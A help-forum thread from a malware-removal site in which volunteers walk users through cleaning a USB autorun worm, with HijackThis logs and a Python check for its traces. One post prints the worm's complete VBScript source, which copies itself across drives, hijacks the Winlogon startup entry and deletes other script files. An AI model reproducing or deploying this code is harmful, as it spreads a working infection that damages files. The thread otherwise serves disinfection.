Hi every38,

Your log looks clean. You'll notice, after running killvbs remover, there is no more F2 line in your log. A very good sign that it's gone…

Suggestions:
Either upgrade your IE to IE7 or use your Firefox, much safer.
Get an AntiVirus. I use and recommend AVAST -> HERE!
Get a 3rd party FireWall. I use and recommend ZoneAlarm -> HERE!
Get a Trojan Blocker. I use and recommend BOClean -> HERE!

To clean your Flash Drives use Flash Disinfector by sUBs -> HERE!

Flash Disinfector Will
- Clean up junks created by flash malwares
- Deletes autorun.inf from every root folder
- Fix back damages done to your system
- Creates an autorun.inf folder in the root of your system drives

How To Use The Tool
*Please remember to disable any AV / ScriptBlockers as they might detect Flash Disinfector to be malicious and block it. Hence, the failure in executing. You can enable them back after the cleaning process*

Or just use your Command method, if it works…

That's about it, just let me know if there is anything else…

2OG
2OG, thanks for your help, but it seems I have another problem. When I copy files to my USB drives, there is a message saying that wscript.exe cannot be found and then the copying stops. Any suggestions?
Hi every38. Just wanted to put my two cents in. Hope you don't mind.

The legitimate wscript.exe is a process relating to Microsoft Windows operating system which allows additional functions to scripting. Also, it can be malware disguising itself. The two reasons I can think of for such an error are these:

1. When you copy files into the usb drives, a script automatically runs, but since wscript.exe does not exist, the script cannot run properly.
2. wscript is an autorun malware which was deleted, but some reference on your drive points to it.

Please check C:\Windows\system32 for the presence of wscript.exe. If it does not exist, there is a chance that it is explanation 1. A more probable explanation is number 2. The malware Vbswg.Aq is highly related to your problem, and I suggest reading about it and how to thoroughly remove it from your system.

Before you start though, please check for the presence of any unknown dll, exe, or vbs files at the beginning of each usb drive. Also, right click on the usb drive icon to see if there are squiggly characters. Click to explore, and then delete the unknown dll, exe, or vbs files and any autorun.inf file. You may have to enable hidden files/hidden protected system files in folder options to see these things.

Here are a few examples of websites you can read from:
http://www.sophos.com/security/analyses/viruses-and-spyware/vbsvbswgaq.html
http://antivirus.about.com/library/weekly/aa060602a.htm
http://www.f-secure.com/v-descs/vbswg_aq.shtml
http://www.pspl.com/virus_info/worms/shakira.htm

Best Regards
every38, Have you used Flash Disinfector to disinfect your Flash drives? It is possible that your wscript file has been lost… Thanks for the input, cadavfrew. I tend to lean toward your explanation 1. If the wscript.exe file is not present in C:\Windows\System32 then I would try to recover it using SFC /scannow. To do this: Check this article for using SFC /scannow >> HERE Gonna catch a few zzzzz’s now 2OG
Characteristics of a virus
Under the root of the documents generated autorun.inf Code is as follows:
killVBS.vbs shellexecute = wscript.exe killVBS.vbs
Feature 2 virus C:\WINDOWS\SYSTEM killVBS.vbs vbs script generated by the host operating wscript.exe
String to the registry start of the filling and C:\WINDOWS1\system32\userinit.exe, C:\WINDOWS1\system32\wscript.exe C:\WINDOWS1\system32\killVBS.vbs
killVBS.vbs vbs script code as follows:

'************************************************* *********
'******************** Anti autorun vbscript ***************
'******************** Version 1.01 ***************
'************************************************* *********
Option Explicit
On Error Resume Next
Dim Fso, Shells, SystemDir, WinDir, Count, File, Drv, Drives, InDrive, ReadAll, AllFile, WriteAll, Del, Chg
Set Fso = CreateObject ( "Scripting.FileSystemObject")
Set Shells = CreateObject ( "Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder (0)
Set SystemDir = Fso.GetSpecialFolder (1)
Set File = Fso.GetFile (WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream (1, -2)
do while not ReadAll.atendofstream
  AllFile = AllFile & ReadAll.readline
  AllFile = AllFile & vbcrlf
Loop
Count = Drv.DriveType
Do
  If Not Fso.FileExists (SystemDir & "\ killVBS.vbs") then
    set WriteAll = Fso.CreateTextFile (SystemDir & "\ killVBS.vbs", 2, true)
    WriteAll.Write AllFile
    WriteAll.close
    set WriteAll = Fso.GetFile (SystemDir & "\ killVBS.vbs")
    WriteAll.Attributes = -1
  End If
  Shells.RegWrite "HKLM \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ Userinit", SystemDir & "\ userinit.exe," & _
    SystemDir & "\ wscript.exe" & SystemDir & "\ killVBS.vbs"
  For Each Drives In InDrive
    If Drives.DriveType = 2 Then
      LookVBS "inf", Drives.Path & "\"
      LookVBS "INF", Drives.Path & "\"
    End if
    If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
      If Drives.Path <> "A:" Then
        Shells.Regdelete "HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ MS32DLL"
        Shells.RegWrite "HKCU \ Software \ Microsoft \ Internet Explorer \ Main \ Window Title", ""
        Shells.RegWrite "HKCU \ Software \ Microsoft \ Internet Explorer \ Main \ Start Page", ""
        Shells.RegWrite "HKCR \ vbsfile \ DefaultIcon", "% SystemRoot% \ System32 \ WScript.exe, 2"
        LookVBS "vbs", WinDir & "\"
        LookVBS "vbs", Drives.Path & "\"
        If Drives.DriveType = 1 Then
          If Drives.Path <> "A:" Then
            If Not Fso.FileExists (Drives.Path & "\ killVBS.vbs") Then
              Set WriteAll = Fso.CreateTextFile (Drives.Path & "\ killVBS.vbs", 2, True)
              WriteAll.Write AllFile
              WriteAll.Close
              Set WriteAll = Fso.GetFile (Drives.Path & "\ killVBS.vbs")
              WriteAll.Attributes = -1
            End If
            If Fso.FileExists (Drives.Path & "\ autorun.inf") Or Fso.FileExists (Drives.Path & "\ AUTORUN.INF") Then
              Set Chg = Fso.GetFile (Drives.Path & "\ autorun.inf")
              Chg.Attributes = -8
              Set WriteAll = Fso.CreateTextFile (Drives.Path & "\ autorun.inf", 2, True)
              WriteAll.writeline "[autorun]"
              WriteAll.WriteLine "shellexecute = wscript.exe killVBS.vbs"
              WriteAll.Close
              Set WriteAll = Fso.GetFile (Drives.Path & "\ autorun.inf")
              WriteAll.Attributes = -1
            else
              Set WriteAll = Fso.CreateTextFile (Drives.Path & "\ autorun.inf", 2, True)
              WriteAll.writeline "[autorun]"
              WriteAll.WriteLine "shellexecute = wscript.exe killVBS.vbs"
              WriteAll.Close
              Set WriteAll = Fso.GetFile (Drives.Path & "\ autorun.inf")
              WriteAll.Attributes = -1
            End if
          End If
        End if
      End if
    End If
  Next
  if Count <> 1 then
    Wscript.sleep 10000
  end if
loop while Count <> 1
sub LookVBS (File2Find, SrchPath)
  Dim oFileSys, oFolder, oFile, Cut, Delete
  Set oFileSys = CreateObject ( "Scripting.FileSystemObject")
  Set oFolder = oFileSys.GetFolder (SrchPath)
  For Each oFile In oFolder.Files
    Cut = Right (oFile.Name, 3)
    If UCase (Cut) = UCase (file2find) Then
      If oFile.Name <> "killVBS.vbs" Then
        Set Delete = oFileSys.DeleteFile (srchpath & oFile.Name, true)
      End If
  Next
End sub

Performance of the virus is as follows A string to IE 2-delete self-replication
U-3 infection
Hi, it's Jenny here. I don't know much about computers. I'm using BitDefender atm (internet security). I was reading one of the replies before and DL HJT. Here's my log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:22:27 PM, on 8/30/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
c:\program files\common files\logitech\lvmvfm\LVPrcSrv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
C:\Program Files\CyberLink\Shared Files\RichVideo.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Common Files\BitDefender\BitDefender Communicator\xcommsvr.exe
C:\Program Files\Common Files\BitDefender\BitDefender Update Service\livesrv.exe
C:\Program Files\BitDefender\BitDefender 2008\vsserv.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Nero\Nero 7\InCD\NBHGui.exe
C:\Program Files\Nero\Nero 7\InCD\InCD.exe
C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
C:\Program Files\BitDefender\BitDefender 2008\bdagent.exe
C:\Program Files\ScanSoft\PaperPort\pptd40nt.exe
C:\Program Files\Brother\Brmfcmon\BrMfcWnd.exe
C:\Program Files\Brother\ControlCenter3\brccMCtl.exe
C:\Program Files\IObit\IObit SmartDefrag\IObit SmartDefrag.exe
C:\PROGRA~1\MYWEBS~1\bar\1.bin\mwsoemon.exe
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\WINDOWS\system32\LVCOMSX.EXE
C:\Program Files\Logitech\Video\CameraAssistant.exe
C:\WINDOWS\system32\ElkCtrl.exe
C:\Program Files\Brother\Brmfcmon\BrMfcmon.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe
C:\Program Files\DNA\btdna.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Sony\Sony Picture Utility\VolumeWatcher\SPUVolumeWatcher.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Windows Live\Messenger\usnsvc.exe
C:\Program Files\BitDefender\BitDefender 2008\uiscan.exe
C:\Program Files\BitDefender\BitDefender 2008\seccenter.exe
C:\WINDOWS\explorer.exe
D:\Products\Internet Security 2008\en\install\32bits\bitdefender_internetsecurity_2008_32b.exe
C:\DOCUME~1\USER\LOCALS~1\Temp\IXP001.TMP\Setup.Exe
C:\Program Files\Safari\Safari.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://search.imesh.com/sidebar.html?src=ssb
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R3 - URLSearchHook: (no name) - {00A6FAF6-072E-44cf-8957-5838F569A31D} - C:\Program Files\MyWebSearch\SrchAstt\1.bin\MWSSRCAS.DLL
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\wscript.exe C:\WINDOWS\system32\killVBS.vbs
O2 - BHO: MyWebSearch Search Assistant BHO - {00A6FAF1-072E-44cf-8957-5838F569A31D} - C:\Program Files\MyWebSearch\SrchAstt\1.bin\MWSSRCAS.DLL
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: mwsBar BHO - {07B18EA1-A523-4961-B6BB-170DE4475CCA} - C:\Program Files\MyWebSearch\bar\1.bin\MWSBAR.DLL
O2 - BHO: UrlHelper Class - {474597C5-AB09-49d6-A4D5-2E8D7341384E} - C:\Program Files\iMesh Applications\iMesh MediaBar\iMeshIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: BitDefender Toolbar - {381FFDE8-2394-4f90-B10D-FC6124A40F8C} - C:\Program Files\BitDefender\BitDefender 2008\IEToolbar.dll
O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: iMesh MediaBar - {B7D3E479-CC68-42B5-A338-938ECE35F419} - C:\Program Files\iMesh Applications\iMesh MediaBar\iMeshMediaBar.dll
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [SecurDisc] C:\Program Files\Nero\Nero 7\InCD\NBHGui.exe
O4 - HKLM\..\Run: [InCD] C:\Program Files\Nero\Nero 7\InCD\InCD.exe
O4 - HKLM\..\Run: [RemoteControl] "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe"
O4 - HKLM\..\Run: [LanguageShortcut] "C:\Program Files\CyberLink\PowerDVD\Language\Language.exe"
O4 - HKLM\..\Run: [BitDefender Antiphishing Helper] "C:\Program Files\BitDefender\BitDefender 2008\IEShow.exe"
O4 - HKLM\..\Run: [BDAgent] "C:\Program Files\BitDefender\BitDefender 2008\bdagent.exe"
O4 - HKLM\..\Run: [SSBkgdUpdate] "C:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot
O4 - HKLM\..\Run: [PaperPort PTD] "C:\Program Files\ScanSoft\PaperPort\pptd40nt.exe"
O4 - HKLM\..\Run: [IndexSearch] "C:\Program Files\ScanSoft\PaperPort\IndexSearch.exe"
O4 - HKLM\..\Run: [PPort11reminder] "C:\Program Files\ScanSoft\PaperPort\Ereg\Ereg.exe" -r "C:\Documents and Settings\All Users\Application Data\ScanSoft\PaperPort\11\Config\Ereg\Ereg.ini
O4 - HKLM\..\Run: [BrMfcWnd] C:\Program Files\Brother\Brmfcmon\BrMfcWnd.exe /AUTORUN
O4 - HKLM\..\Run: [ControlCenter3] C:\Program Files\Brother\ControlCenter3\brctrcen.exe /autorun
O4 - HKLM\..\Run: [SmartDefrag] "C:\Program Files\IObit\IObit SmartDefrag\IObit SmartDefrag.exe" /StartUp
O4 - HKLM\..\Run: [MyWebSearch Plugin] rundll32 C:\PROGRA~1\MYWEBS~1\bar\1.bin\M3PLUGIN.DLL,UPF
O4 - HKLM\..\Run: [My Web Search Bar] rundll32 C:\PROGRA~1\MYWEBS~1\bar\1.bin\MWSBAR.DLL,S
O4 - HKLM\..\Run: [MyWebSearch Email Plugin] C:\PROGRA~1\MYWEBS~1\bar\1.bin\mwsoemon.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe"
O4 - HKLM\..\Run: [LVCOMSX] C:\WINDOWS\system32\LVCOMSX.EXE
O4 - HKLM\..\Run: [LogitechCameraAssistant] C:\Program Files\Logitech\Video\CameraAssistant.exe
O4 - HKLM\..\Run: [LogitechVideo[inspector]] C:\Program Files\Logitech\Video\InstallHelper.exe /inspect
O4 - HKLM\..\Run: [LogitechCameraService(E)] C:\WINDOWS\system32\ElkCtrl.exe /automation
O4 - HKLM\..\Run: [AppleSyncNotifier] C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\RunOnce: [wextract_cleanup0] rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\DOCUME~1\USER\LOCALS~1\Temp\IXP001.TMP\"
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [BitTorrent DNA] "C:\Program Files\DNA\btdna.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MyWebSearch Email Plugin] C:\PROGRA~1\MYWEBS~1\bar\1.bin\mwsoemon.exe
O4 - Startup: Picture Motion Browser Media Check Tool.lnk = C:\Program Files\Sony\Sony Picture Utility\VolumeWatcher\SPUVolumeWatcher.exe
O8 - Extra context menu item: &Search - http://edits.mywebsearch.com/toolbaredits/menusearch.jhtml?p=ZKfox000
O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: Add to Windows &Live Favorites - http://favorites.live.com/quickadd.aspx
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra button: Blog This - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: &Blog This in Windows Live Writer - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/win...ls/en/x86/client/wuweb_site.cab?1212561845984
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: BitDefender Desktop Update Service (LIVESRV) - BitDefender SRL - C:\Program Files\Common Files\BitDefender\BitDefender Update Service\livesrv.exe
O23 - Service: Logitech Process Monitor (LVPrcSrv) - Logitech Inc. - c:\program files\common files\logitech\lvmvfm\LVPrcSrv.exe
O23 - Service: My Web Search Service (MyWebSearchService) - MyWebSearch.com - C:\PROGRA~1\MYWEBS~1\bar\1.bin\mwssvc.exe
O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files\CyberLink\Shared Files\RichVideo.exe
O23 - Service: BitDefender Virus Shield (VSSERV) - BitDefender S.R.L. - C:\Program Files\BitDefender\BitDefender 2008\vsserv.exe
O23 - Service: BitDefender Communicator (XCOMM) - BitDefender - C:\Program Files\Common Files\BitDefender\BitDefender Communicator\xcommsvr.exe

-- End of file - 11005 bytes
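The following Python check is an added example, not part of any post in this thread and not code from the tools mentioned: it flags the two artefacts described above, a Winlogon Userinit value carrying extra entries (the HijackThis F2 line) and an autorun.inf whose launch keys start a script. The function names, the script-host and extension lists, and the rule that only a bare path ending in \system32\userinit.exe counts as the stock entry are assumptions of this example.

```python
import re

# Assumed lists for this example; extend them to match local policy.
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd")

# Constructed samples: the F2 line is the one in the log above, and the
# autorun.inf body is the one the worm description says it writes.
SAMPLE_HJT = r"""
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page =
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\wscript.exe C:\WINDOWS\system32\killVBS.vbs
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
"""
SAMPLE_INF = "[autorun]\nshellexecute = wscript.exe killVBS.vbs\n"
BENIGN_INF = "[autorun]\nicon=setup.ico\nopen=setup.exe\n"  # hypothetical installer disc


def extra_userinit_entries(value):
    """Return the comma-separated Userinit entries that are not userinit.exe.

    Heuristic (assumption): a bare path ending in \\system32\\userinit.exe is
    the stock entry; everything else is returned for review.
    """
    entries = [e.strip() for e in value.split(",") if e.strip()]
    return [e for e in entries
            if not e.lower().endswith("\\system32\\userinit.exe")]


def hjt_userinit_findings(log_text):
    """Audit the UserInit value of every F2 line in a HijackThis log."""
    findings = []
    for line in log_text.splitlines():
        m = re.match(r"\s*F2 - REG:system\.ini: UserInit=(.*)", line, re.I)
        if m:
            findings.extend(extra_userinit_entries(m.group(1)))
    return findings


def autorun_script_launchers(inf_text):
    """Return (key, command) pairs in [autorun] that would start a script."""
    hits, in_section = [], False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
            continue
        if not in_section or "=" not in line or line.startswith(";"):
            continue
        key, command = (part.strip() for part in line.split("=", 1))
        key_l, cmd_l = key.lower(), command.lower()
        # Keys that make Explorer run something: open, shellexecute, shell\verb\command
        is_launch = key_l in ("open", "shellexecute") or (
            key_l.startswith("shell\\") and key_l.endswith("\\command"))
        runs_script = any(h in cmd_l for h in SCRIPT_HOSTS) or any(
            tok.strip('"').endswith(SCRIPT_EXTS) for tok in cmd_l.split())
        if is_launch and runs_script:
            hits.append((key, command))
    return hits


if __name__ == "__main__":
    print("Userinit extras:", hjt_userinit_findings(SAMPLE_HJT))
    print("autorun.inf launchers:", autorun_script_launchers(SAMPLE_INF))
```
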
@ j2k3,

Hi Jenny

My handle is 2oldGeek and I will help you to remove any infection(s) that you may have. I will be giving you a series of instructions that need to be followed in the order in which I give them to you. If for any reason you do not understand an instruction or are just unsure then please do not guess, simply post back with your questions/concerns and we will go through it again. Please do not start another thread or topic, I will assist you at this thread until we solve your problems. Lastly the fix may take several attempts and my replies may take some time but I will stick with it if you do the same.

That said, All advice given by anyone volunteering here, is taken at own risk. While best efforts are made to assist in removing infections safely, unexpected stuff can happen.

Jenny, you are infected with some nasty Trojans and Malware, so let’s start the cleanup like this:

Please download ATF Cleaner by Atribune & save it to your desktop. Double-click ATF-Cleaner.exe to run the program.
• Under Main "Select Files to Delete" choose: Select All.
• Click the Empty Selected button.
• If you use Firefox browser click Firefox at the top and choose: Select All
• Click the Empty Selected button. If you would like to keep your saved passwords, please click No at the prompt.
• If you use Opera browser click Opera at the top and choose: Select All
• Click the Empty Selected button. If you would like to keep your saved passwords, please click No at the prompt.
• Click Exit on the Main menu to close the program.

Next: Download Malwarebytes' Anti-Malware to your desktop. Double-click mbam-setup.exe and follow the prompts to install the program.
• At the end, be sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
• If an update is found, it will download and install the latest version.
• Once the program has loaded, select Perform full scan, then click Scan.
• When the scan is complete, click OK, then Show Results to view the results.
• Make sure that everything is checked, and click Remove Selected. <-- Don't forget this.
• When completed, a log will open in Notepad. Please save it to a convenient location. The log can also be found here: C:\Documents and Settings\Username\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs\log-date.txt
• Please post the MBAM Log and a fresh HJT log in your next reply.

2OG